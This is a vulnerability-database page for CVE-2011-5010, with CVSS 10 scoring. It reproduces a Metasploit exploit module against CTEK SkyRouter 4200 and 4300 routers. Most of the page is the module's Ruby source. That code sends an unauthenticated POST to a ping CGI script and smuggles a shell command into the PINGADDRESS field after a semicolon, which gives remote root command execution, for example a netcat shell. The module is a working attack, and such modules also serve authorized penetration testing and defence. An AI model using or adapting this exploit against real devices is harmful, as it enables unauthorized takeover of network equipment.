Lucene search

K
metasploitSavant42MSF:EXPLOIT-UNIX-HTTP-CTEK_SKYROUTER-
HistoryNov 29, 2011 - 9:30 a.m.

CTEK SkyRouter 4200 and 4300 Command Execution

2011-11-2909:30:49
savant42
www.rapid7.com
3

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CTEK SkyRouter 4200 and 4300 Command Execution',
      'Description'    => %q{
          This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.
      },
      'Author'         => [ 'savant42' ],  #with module help from kos
      'License'        => MSF_LICENSE,
      'References'     => [
                  ['CVE', '2011-5010'],
                  ['OSVDB', '77497']
                ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet netcat netcat-e',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2011-09-08', # CGI historical date :)
      'DefaultTarget' => 0))

  end

  def exploit
    post_data = "MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;" + Rex::Text.uri_encode(payload.encoded) + "+%26"
    uri    = '/apps/a3/cfg_ethping.cgi'
    print_status("Sending HTTP request for #{uri}")
    res = send_request_cgi( {
      'global' => true,
      'uri'    => uri,
      'method' => "POST",
      'data' => post_data
    }, 30)

    if res
      print_status("The server responded with HTTP CODE #{res.code}")
    else
      print_status("The server did not respond to our request")
    end

    handler
  end
end

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

Related for MSF:EXPLOIT-UNIX-HTTP-CTEK_SKYROUTER-